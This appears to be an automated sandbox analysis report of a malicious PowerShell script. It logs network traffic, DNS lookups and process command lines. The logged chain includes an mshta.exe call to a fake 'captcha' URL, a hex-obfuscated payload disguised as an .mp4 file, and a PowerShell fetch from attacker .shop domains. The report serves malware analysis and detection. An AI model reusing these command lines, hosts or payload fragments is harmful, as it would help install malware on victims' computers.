                                                      Jan 1, 2025 05:36:02.881335020 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.881407022 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.881412029 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.881448030 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.881858110 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.881870985 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.881920099 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.881925106 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.881958961 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.881979942 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.882201910 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.882231951 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.882242918 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.882266998 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.882270098 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.882275105 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.882296085 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.882368088 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.882371902 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.882375956 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.882414103 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.882417917 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.882432938 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.882455111 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.882493019 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.882792950 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.882807016 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:11.083738089 CET49737443192.168.2.4188.114.97.3
                                                      Jan 1, 2025 05:36:11.083779097 CET44349737188.114.97.3192.168.2.4
                                                      Jan 1, 2025 05:36:11.083847046 CET49737443192.168.2.4188.114.97.3
                                                      Jan 1, 2025 05:36:11.093849897 CET49737443192.168.2.4188.114.97.3
                                                      Jan 1, 2025 05:36:11.093863010 CET44349737188.114.97.3192.168.2.4
                                                      Jan 1, 2025 05:36:11.562410116 CET44349737188.114.97.3192.168.2.4
                                                      Jan 1, 2025 05:36:11.562483072 CET49737443192.168.2.4188.114.97.3
                                                      Jan 1, 2025 05:36:11.564594030 CET49737443192.168.2.4188.114.97.3
                                                      Jan 1, 2025 05:36:11.564608097 CET44349737188.114.97.3192.168.2.4
                                                      Jan 1, 2025 05:36:11.564798117 CET44349737188.114.97.3192.168.2.4
                                                      Jan 1, 2025 05:36:11.577732086 CET49737443192.168.2.4188.114.97.3
                                                      Jan 1, 2025 05:36:11.623341084 CET44349737188.114.97.3192.168.2.4
                                                      Jan 1, 2025 05:36:50.636832952 CET44349737188.114.97.3192.168.2.4
                                                      Jan 1, 2025 05:36:50.636893034 CET44349737188.114.97.3192.168.2.4
                                                      Jan 1, 2025 05:36:50.636989117 CET49737443192.168.2.4188.114.97.3
                                                      Jan 1, 2025 05:36:50.643488884 CET49737443192.168.2.4188.114.97.3

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 1, 2025 05:35:59.437186003 CET6345453192.168.2.41.1.1.1
                                                      Jan 1, 2025 05:35:59.449059963 CET53634541.1.1.1192.168.2.4
                                                      Jan 1, 2025 05:36:00.795576096 CET5783753192.168.2.41.1.1.1
                                                      Jan 1, 2025 05:36:00.807666063 CET53578371.1.1.1192.168.2.4
                                                      Jan 1, 2025 05:36:11.068502903 CET5640853192.168.2.41.1.1.1
                                                      Jan 1, 2025 05:36:11.079205036 CET53564081.1.1.1192.168.2.4

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Jan 1, 2025 05:35:59.437186003 CET192.168.2.41.1.1.10x3c4bStandard query (0)solve.vwglq.comA (IP address)IN (0x0001)false
                                                      Jan 1, 2025 05:36:00.795576096 CET192.168.2.41.1.1.10x9befStandard query (0)deduhko2.kliphuwatey.shopA (IP address)IN (0x0001)false
                                                      Jan 1, 2025 05:36:11.068502903 CET192.168.2.41.1.1.10x9327Standard query (0)deduhko.klipzyroloo.shopA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Jan 1, 2025 05:35:59.449059963 CET1.1.1.1192.168.2.40x3c4bNo error (0)solve.vwglq.com188.114.97.3A (IP address)IN (0x0001)false
                                                      Jan 1, 2025 05:35:59.449059963 CET1.1.1.1192.168.2.40x3c4bNo error (0)solve.vwglq.com188.114.96.3A (IP address)IN (0x0001)false
                                                      Jan 1, 2025 05:36:00.807666063 CET1.1.1.1192.168.2.40x9befNo error (0)deduhko2.kliphuwatey.shop172.67.144.62A (IP address)IN (0x0001)false
                                                      Jan 1, 2025 05:36:00.807666063 CET1.1.1.1192.168.2.40x9befNo error (0)deduhko2.kliphuwatey.shop104.21.28.48A (IP address)IN (0x0001)false
                                                      Jan 1, 2025 05:36:11.079205036 CET1.1.1.1192.168.2.40x9327No error (0)deduhko.klipzyroloo.shop188.114.97.3A (IP address)IN (0x0001)false
                                                      Jan 1, 2025 05:36:11.079205036 CET1.1.1.1192.168.2.40x9327No error (0)deduhko.klipzyroloo.shop188.114.96.3A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • solve.vwglq.com
                                                      • deduhko2.kliphuwatey.shop
                                                      • deduhko.klipzyroloo.shop

                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449730188.114.97.34437584C:\Windows\System32\mshta.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-01 04:36:00 UTC371OUTGET /awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-CH
                                                      UA-CPU: AMD64
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                      Host: solve.vwglq.com
                                                      Connection: Keep-Alive
                                                      2025-01-01 04:36:00 UTC851INHTTP/1.1 302 Found
                                                      Date: Wed, 01 Jan 2025 04:36:00 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Location: https://deduhko2.kliphuwatey.shop/Poket.mp4
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2Bm9b8N%2BOoiNQtXITTdxiXUue1y6ry3c%2BSFDmVAQ%2FRYIT7juA6ncafKms5I5pTAttrFewSjpdHRYiLnFTnYw7d%2FOiJnTTwwZwP3E74THqN44GhhJ43ejXF%2BDSqZZF3dQTmE%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8fafce4dba156a53-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1525&min_rtt=1514&rtt_var=590&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=953&delivery_rate=1821584&cwnd=222&unsent_bytes=0&cid=6a004c9b6a863e7f&ts=647&x=0"
                                                      2025-01-01 04:36:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.449731172.67.144.624437584C:\Windows\System32\mshta.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-01 04:36:01 UTC338OUTGET /Poket.mp4 HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-CH
                                                      UA-CPU: AMD64
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                      Connection: Keep-Alive
                                                      Host: deduhko2.kliphuwatey.shop
                                                      2025-01-01 04:36:01 UTC918INHTTP/1.1 200 OK
                                                      Date: Wed, 01 Jan 2025 04:36:01 GMT
                                                      Content-Type: video/mp4
                                                      Content-Length: 1645681
                                                      Connection: close
                                                      Accept-Ranges: bytes
                                                      ETag: "9fb3db7b334f385701b3c88d63b7e5ee"
                                                      Last-Modified: Sun, 29 Dec 2024 20:29:14 GMT
                                                      Vary: Accept-Encoding
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N8UH%2BJEsxkb%2BKQYeqDnVqdcQyNppQRHpcNEB0YZXaakWClFV1jzx46tNZXJVwE0%2FOGnYvQlPp4ec9JJgaG3%2BIkE4AuXAWqTfREyxaP0ZTPF2uZRNVqftsPlpF%2BtLWi5CBEV%2FDc8ZtGlKpjm3"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8fafce54881f7c7e-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1872&min_rtt=1867&rtt_var=711&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2873&recv_bytes=920&delivery_rate=1528795&cwnd=228&unsent_bytes=0&cid=7f8b91026d8f1fc4&ts=295&x=0"
                                                      2025-01-01 04:36:01 UTC451INData Raw: 36 36 4b 37 35 53 36 65 69 36 33 4b 37 34 73 36 39 70 36 66 45 36 65 43 32 30 4c 34 31 57 37 61 5a 34 33 6c 35 37 63 36 64 4a 32 38 4d 36 39 41 36 63 68 36 33 59 34 64 4f 34 39 4a 36 33 71 32 39 71 37 62 63 37 36 77 36 31 66 37 32 73 32 30 69 36 33 67 34 61 58 37 36 73 37 38 61 35 30 41 33 64 6b 32 30 57 32 37 79 32 37 63 33 62 4f 36 36 45 36 66 57 37 32 76 32 30 57 32 38 4b 37 36 64 36 31 7a 37 32 49 32 30 41 34 66 41 36 62 44 36 32 77 34 65 63 37 30 61 35 36 45 32 30 48 33 64 73 32 30 51 33 30 55 33 62 70 34 66 6d 36 62 65 36 32 7a 34 65 48 37 30 59 35 36 65 32 30 54 33 63 76 32 30 59 36 39 42 36 63 46 36 33 4b 34 64 6a 34 39 6c 36 33 64 32 65 42 36 63 54 36 35 6e 36 65 67 36 37 4d 37 34 64 36 38 6e 33 62 66 32 30 72 34 66 66 36 62 6b 36 32 75 34 65 53
                                                      Data Ascii: 66K75S6ei63K74s69p6fE6eC20L41W7aZ43l57c6dJ28M69A6ch63Y4dO49J63q29q7bc76w61f72s20i63g4aX76s78a50A3dk20W27y27c3bO66E6fW72v20W28K76d61z72I20A4fA6bD62w4ec70a56E20H3ds20Q30U3bp4fm6be62z4eH70Y56e20T3cv20Y69B6cF63K4dj49l63d2eB6cT65n6eg67M74d68n3bf20r4ff6bk62u4eS
                                                      2025-01-01 04:36:01 UTC1369INData Raw: 30 4a 33 64 76 32 30 49 36 33 65 34 61 44 37 36 70 37 38 76 35 30 4d 32 30 50 32 62 67 32 30 74 34 38 57 36 33 4a 35 37 50 34 33 69 34 37 47 37 64 6d 37 32 76 36 35 53 37 34 4c 37 35 71 37 32 52 36 65 66 32 30 67 36 33 45 34 61 63 37 36 57 37 38 64 35 30 4a 37 64 57 33 62 69 37 36 64 36 31 52 37 32 55 32 30 67 36 33 46 34 61 74 37 36 76 37 38 7a 35 30 72 32 30 42 33 64 5a 32 30 48 34 31 58 37 61 63 34 33 79 35 37 75 36 64 58 32 38 6e 35 62 51 33 35 6e 33 30 67 33 37 48 32 63 44 33 35 55 33 30 72 33 36 50 32 63 62 33 35 5a 33 31 62 33 34 54 32 63 52 33 34 43 33 39 74 33 36 79 32 63 50 33 35 46 33 30 6f 33 39 6a 32 63 64 33 35 4d 33 31 72 33 30 77 32 63 62 33 34 4a 33 39 51 33 39 4a 32 63 49 33 34 45 33 39 47 33 36 68 32 63 79 33 35 70 33 30 74 33 33 6a 32
                                                      Data Ascii: 0J3dv20I63e4aD76p78v50M20P2bg20t48W63J57P43i47G7dm72v65S74L75q72R6ef20g63E4ac76W78d50J7dW3bi76d61R72U20g63F4at76v78z50r20B3dZ20H41X7ac43y57u6dX28n5bQ35n30g37H2cD35U30r36P2cb35Z31b34T2cR34C39t36y2cP35F30o39j2cd35M31r30w2cb34J39Q39J2cI34E39G36h2cy35p30t33j2
                                                      2025-01-01 04:36:01 UTC1369INData Raw: 6c 32 63 57 33 34 6b 33 33 65 33 34 6c 32 63 76 33 34 54 33 34 54 33 33 53 32 63 4e 33 35 4d 33 31 41 33 35 6a 32 63 64 33 34 4d 33 33 6d 33 31 6b 32 63 73 33 34 42 33 33 4b 33 33 45 32 63 49 33 34 7a 33 32 4f 33 37 4d 32 63 66 33 34 45 33 33 72 33 34 64 32 63 77 33 34 41 33 33 5a 33 36 50 32 63 6c 33 35 54 33 32 50 33 30 44 32 63 4b 33 34 6e 33 35 4c 33 34 4d 32 63 5a 33 34 72 33 33 69 33 31 57 32 63 63 33 34 46 33 38 61 33 31 56 32 63 71 33 34 6a 33 38 6a 33 30 70 32 63 75 33 34 77 33 37 63 33 36 58 32 63 57 33 34 52 33 36 47 33 31 72 32 63 62 33 35 70 33 31 57 33 32 4e 32 63 6e 33 34 6c 33 32 79 33 37 4b 32 63 78 33 34 69 33 35 5a 33 36 46 32 63 71 33 34 78 33 32 66 33 37 51 32 63 51 33 34 73 33 36 6b 33 35 61 32 63 64 33 34 57 33 37 6e 33 37 4e 32 63
                                                      Data Ascii: l2cW34k33e34l2cv34T34T33S2cN35M31A35j2cd34M33m31k2cs34B33K33E2cI34z32O37M2cf34E33r34d2cw34A33Z36P2cl35T32P30D2cK34n35L34M2cZ34r33i31W2cc34F38a31V2cq34j38j30p2cu34w37c36X2cW34R36G31r2cb35p31W32N2cn34l32y37K2cx34i35Z36F2cq34x32f37Q2cQ34s36k35a2cd34W37n37N2c
                                                      2025-01-01 04:36:01 UTC1369INData Raw: 32 63 43 33 34 4f 33 34 4e 33 39 75 32 63 65 33 34 6d 33 36 7a 33 34 42 32 63 71 33 34 79 33 34 6d 33 35 77 32 63 4b 33 34 63 33 34 4d 33 36 65 32 63 54 33 34 4d 33 36 73 33 31 54 32 63 77 33 34 5a 33 36 53 33 33 69 32 63 6c 33 34 5a 33 34 55 33 39 50 32 63 67 33 34 74 33 34 62 33 34 55 32 63 78 33 34 6b 33 35 75 33 31 4f 32 63 67 33 34 4a 33 36 66 33 35 65 32 63 72 33 34 4b 33 34 4a 33 36 73 32 63 41 33 34 55 33 34 4a 33 33 58 32 63 58 33 34 64 33 34 59 33 33 73 32 63 53 33 34 67 33 34 45 33 35 64 32 63 77 33 34 66 33 34 4a 33 33 46 32 63 52 33 34 6b 33 34 55 33 36 78 32 63 57 33 34 52 33 34 79 33 34 5a 32 63 68 33 34 79 33 35 79 33 31 4b 32 63 67 33 34 4f 33 36 62 33 30 6c 32 63 50 33 34 5a 33 36 68 33 30 52 32 63 50 33 34 77 33 34 73 33 33 43 32 63 55
                                                      Data Ascii: 2cC34O34N39u2ce34m36z34B2cq34y34m35w2cK34c34M36e2cT34M36s31T2cw34Z36S33i2cl34Z34U39P2cg34t34b34U2cx34k35u31O2cg34J36f35e2cr34K34J36s2cA34U34J33X2cX34d34Y33s2cS34g34E35d2cw34f34J33F2cR34k34U36x2cW34R34y34Z2ch34y35y31K2cg34O36b30l2cP34Z36h30R2cP34w34s33C2cU
                                                      2025-01-01 04:36:01 UTC1369INData Raw: 63 61 33 34 70 33 34 56 33 38 64 32 63 65 33 34 77 33 34 63 33 36 63 32 63 49 33 34 6e 33 34 70 33 34 4b 32 63 79 33 34 4e 33 34 69 33 36 5a 32 63 56 33 34 6b 33 36 4a 33 30 77 32 63 41 33 34 79 33 36 61 33 33 50 32 63 69 33 34 6f 33 36 66 33 33 51 32 63 79 33 34 62 33 36 74 33 31 51 32 63 44 33 34 53 33 35 42 33 30 56 32 63 47 33 34 76 33 34 6d 33 35 45 32 63 68 33 34 66 33 34 6b 33 36 4f 32 63 75 33 34 62 33 34 6a 33 33 49 32 63 78 33 34 4c 33 34 73 33 39 70 32 63 51 33 34 56 33 36 70 33 33 62 32 63 50 33 34 46 33 34 76 33 37 71 32 63 52 33 34 4d 33 34 65 33 34 68 32 63 75 33 34 5a 33 35 48 33 31 67 32 63 4c 33 34 4e 33 34 54 33 37 61 32 63 79 33 34 45 33 35 4f 33 31 56 32 63 4f 33 34 4d 33 34 55 33 34 48 32 63 46 33 34 57 33 34 53 33 34 6d 32 63 6a 33
                                                      Data Ascii: ca34p34V38d2ce34w34c36c2cI34n34p34K2cy34N34i36Z2cV34k36J30w2cA34y36a33P2ci34o36f33Q2cy34b36t31Q2cD34S35B30V2cG34v34m35E2ch34f34k36O2cu34b34j33I2cx34L34s39p2cQ34V36p33b2cP34F34v37q2cR34M34e34h2cu34Z35H31g2cL34N34T37a2cy34E35O31V2cO34M34U34H2cF34W34S34m2cj3
                                                      2025-01-01 04:36:01 UTC1369INData Raw: 56 33 34 43 33 35 6d 33 32 6a 32 63 57 33 34 77 33 34 59 33 33 68 32 63 75 33 34 67 33 36 6a 33 31 6b 32 63 71 33 34 4f 33 36 77 33 32 5a 32 63 46 33 34 48 33 36 6a 33 30 57 32 63 4b 33 34 62 33 35 56 33 32 6a 32 63 68 33 34 53 33 36 77 33 31 52 32 63 4a 33 34 63 33 36 61 33 34 53 32 63 46 33 34 57 33 34 6c 33 36 63 32 63 6b 33 34 68 33 34 79 33 33 63 32 63 56 33 34 6c 33 36 74 33 35 79 32 63 7a 33 34 43 33 36 6e 33 34 6f 32 63 4e 33 34 52 33 35 4b 33 31 70 32 63 49 33 34 76 33 36 4c 33 33 74 32 63 68 33 34 43 33 36 43 33 34 45 32 63 7a 33 34 47 33 34 59 33 35 52 32 63 47 33 34 52 33 34 66 33 39 54 32 63 63 33 34 55 33 36 70 33 34 59 32 63 4a 33 34 48 33 34 42 33 37 59 32 63 68 33 34 57 33 36 6b 33 35 65 32 63 65 33 34 49 33 34 45 33 36 72 32 63 52 33 34
                                                      Data Ascii: V34C35m32j2cW34w34Y33h2cu34g36j31k2cq34O36w32Z2cF34H36j30W2cK34b35V32j2ch34S36w31R2cJ34c36a34S2cF34W34l36c2ck34h34y33c2cV34l36t35y2cz34C36n34o2cN34R35K31p2cI34v36L33t2ch34C36C34E2cz34G34Y35R2cG34R34f39T2cc34U36p34Y2cJ34H34B37Y2ch34W36k35e2ce34I34E36r2cR34
                                                      2025-01-01 04:36:01 UTC1369INData Raw: 33 34 42 33 34 7a 33 35 44 32 63 73 33 34 6e 33 34 76 33 37 76 32 63 58 33 34 43 33 36 50 33 32 49 32 63 64 33 34 6b 33 34 7a 33 37 51 32 63 49 33 34 6a 33 35 6b 33 31 5a 32 63 4d 33 34 4e 33 36 65 33 33 4e 32 63 4a 33 34 78 33 35 54 33 31 55 32 63 6a 33 34 47 33 35 4c 33 32 65 32 63 50 33 34 56 33 34 6d 33 35 75 32 63 41 33 34 59 33 34 75 33 34 78 32 63 74 33 34 79 33 36 63 33 33 6e 32 63 48 33 34 68 33 34 53 33 39 76 32 63 4e 33 34 68 33 36 48 33 32 66 32 63 66 33 34 50 33 34 43 33 33 62 32 63 58 33 34 6c 33 34 74 33 35 76 32 63 55 33 34 61 33 34 4d 33 39 51 32 63 71 33 34 6b 33 36 74 33 32 49 32 63 79 33 34 45 33 34 50 33 35 6a 32 63 6f 33 34 6d 33 36 67 33 33 4f 32 63 6b 33 34 71 33 35 47 33 30 63 32 63 65 33 34 58 33 34 48 33 39 42 32 63 7a 33 34 66
                                                      Data Ascii: 34B34z35D2cs34n34v37v2cX34C36P32I2cd34k34z37Q2cI34j35k31Z2cM34N36e33N2cJ34x35T31U2cj34G35L32e2cP34V34m35u2cA34Y34u34x2ct34y36c33n2cH34h34S39v2cN34h36H32f2cf34P34C33b2cX34l34t35v2cU34a34M39Q2cq34k36t32I2cy34E34P35j2co34m36g33O2ck34q35G30c2ce34X34H39B2cz34f
                                                      2025-01-01 04:36:01 UTC1369INData Raw: 34 7a 33 34 4f 33 35 64 32 63 4c 33 34 74 33 34 4c 33 35 67 32 63 42 33 34 67 33 36 57 33 34 71 32 63 6c 33 34 54 33 35 6a 33 31 76 32 63 74 33 34 4e 33 36 55 33 30 44 32 63 65 33 34 48 33 35 55 33 31 6c 32 63 69 33 34 4c 33 35 65 33 31 76 32 63 44 33 34 5a 33 36 79 33 30 54 32 63 71 33 34 65 33 36 67 33 32 58 32 63 73 33 34 6a 33 34 6d 33 36 66 32 63 67 33 34 57 33 34 6a 33 34 49 32 63 6e 33 34 59 33 34 6b 33 39 52 32 63 69 33 34 74 33 34 71 33 37 46 32 63 5a 33 34 4b 33 36 51 33 31 4e 32 63 66 33 34 63 33 34 76 33 33 41 32 63 4f 33 34 51 33 36 64 33 35 62 32 63 69 33 34 43 33 36 41 33 35 48 32 63 6e 33 34 4c 33 36 44 33 30 4a 32 63 61 33 34 6f 33 34 57 33 33 49 32 63 59 33 34 4d 33 36 79 33 35 4a 32 63 61 33 34 4d 33 36 4d 33 34 4a 32 63 69 33 34 73 33
                                                      Data Ascii: 4z34O35d2cL34t34L35g2cB34g36W34q2cl34T35j31v2ct34N36U30D2ce34H35U31l2ci34L35e31v2cD34Z36y30T2cq34e36g32X2cs34j34m36f2cg34W34j34I2cn34Y34k39R2ci34t34q37F2cZ34K36Q31N2cf34c34v33A2cO34Q36d35b2ci34C36A35H2cn34L36D30J2ca34o34W33I2cY34M36y35J2ca34M36M34J2ci34s3
                                                      2025-01-01 04:36:01 UTC1369INData Raw: 79 33 36 48 33 31 46 32 63 4d 33 34 62 33 36 59 33 34 41 32 63 48 33 34 51 33 34 5a 33 34 70 32 63 5a 33 34 41 33 36 4d 33 34 4d 32 63 76 33 34 50 33 36 62 33 33 52 32 63 79 33 34 5a 33 36 42 33 33 65 32 63 55 33 34 6a 33 34 64 33 35 4d 32 63 6c 33 34 64 33 34 4a 33 34 51 32 63 46 33 34 55 33 34 73 33 35 44 32 63 59 33 34 6c 33 34 70 33 34 41 32 63 48 33 34 72 33 34 67 33 37 77 32 63 4f 33 34 4c 33 34 75 33 37 4f 32 63 51 33 34 68 33 36 6d 33 32 4d 32 63 70 33 34 76 33 34 76 33 37 77 32 63 78 33 34 63 33 36 6c 33 34 63 32 63 79 33 34 4d 33 34 4f 33 38 64 32 63 47 33 34 4a 33 36 6a 33 34 46 32 63 48 33 34 49 33 36 6f 33 33 4a 32 63 61 33 34 62 33 36 4a 33 30 47 32 63 74 33 34 45 33 34 51 33 38 49 32 63 70 33 34 4f 33 34 76 33 33 44 32 63 72 33 34 78 33 34
                                                      Data Ascii: y36H31F2cM34b36Y34A2cH34Q34Z34p2cZ34A36M34M2cv34P36b33R2cy34Z36B33e2cU34j34d35M2cl34d34J34Q2cF34U34s35D2cY34l34p34A2cH34r34g37w2cO34L34u37O2cQ34h36m32M2cp34v34v37w2cx34c36l34c2cy34M34O38d2cG34J36j34F2cH34I36o33J2ca34b36J30G2ct34E34Q38I2cp34O34v33D2cr34x34
                                                      2025-01-01 04:36:01 UTC1369INData Raw: 33 34 58 33 35 46 32 63 7a 33 34 6d 33 36 78 33 32 53 32 63 7a 33 34 76 33 36 65 33 32 71 32 63 65 33 34 4c 33 36 52 33 33 74 32 63 5a 33 34 6a 33 35 48 33 31 61 32 63 59 33 34 6d 33 34 6c 33 33 54 32 63 69 33 34 4e 33 36 65 33 33 6e 32 63 77 33 34 59 33 34 4e 33 33 6b 32 63 78 33 34 50 33 34 71 33 33 5a 32 63 56 33 34 65 33 34 64 33 39 66 32 63 51 33 34 71 33 34 45 33 33 54 32 63 49 33 34 69 33 36 79 33 33 78 32 63 49 33 34 74 33 36 66 33 35 47 32 63 47 33 34 48 33 34 71 33 38 58 32 63 61 33 34 44 33 34 57 33 36 6d 32 63 48 33 34 4a 33 34 57 33 35 61 32 63 68 33 34 74 33 36 73 33 33 50 32 63 55 33 34 73 33 35 58 33 32 75 32 63 46 33 34 62 33 34 4b 33 35 69 32 63 68 33 34 53 33 36 4c 33 33 7a 32 63 4f 33 34 68 33 34 65 33 38 44 32 63 73 33 34 48 33 34 64
                                                      Data Ascii: 34X35F2cz34m36x32S2cz34v36e32q2ce34L36R33t2cZ34j35H31a2cY34m34l33T2ci34N36e33n2cw34Y34N33k2cx34P34q33Z2cV34e34d39f2cQ34q34E33T2cI34i36y33x2cI34t36f35G2cG34H34q38X2ca34D34W36m2cH34J34W35a2ch34t36s33P2cU34s35X32u2cF34b34K35i2ch34S36L33z2cO34h34e38D2cs34H34d


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.449737188.114.97.34438128C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-01 04:36:11 UTC83OUTGET /mazkk.eml HTTP/1.1
                                                      Host: deduhko.klipzyroloo.shop
                                                      Connection: Keep-Alive
                                                      2025-01-01 04:36:50 UTC597INHTTP/1.1 522
                                                      Date: Wed, 01 Jan 2025 04:36:50 GMT
                                                      Content-Type: text/plain; charset=UTF-8
                                                      Content-Length: 15
                                                      Connection: close
                                                      X-Frame-Options: SAMEORIGIN
                                                      Referrer-Policy: same-origin
                                                      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                      Server: cloudflare
                                                      CF-RAY: 8fafce94dd61c33c-EWR
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1642&min_rtt=1640&rtt_var=619&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=697&delivery_rate=1761158&cwnd=148&unsent_bytes=0&cid=1795b2b9133f6809&ts=39083&x=0"
                                                      2025-01-01 04:36:50 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                      Data Ascii: error code: 522


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:23:35:56
                                                      Start date:31/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.ps1"
                                                      Imagebase:0x7ff788560000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:1
                                                      Start time:23:35:56
                                                      Start date:31/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:23:35:57
                                                      Start date:31/12/2024
                                                      Path:C:\Windows\System32\mshta.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\system32\mshta.exe" https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d
                                                      Imagebase:0x7ff61ba10000
                                                      File size:14'848 bytes
                                                      MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:3
                                                      Start time:23:36:00
                                                      Start date:31/12/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:4
                                                      Start time:23:36:02
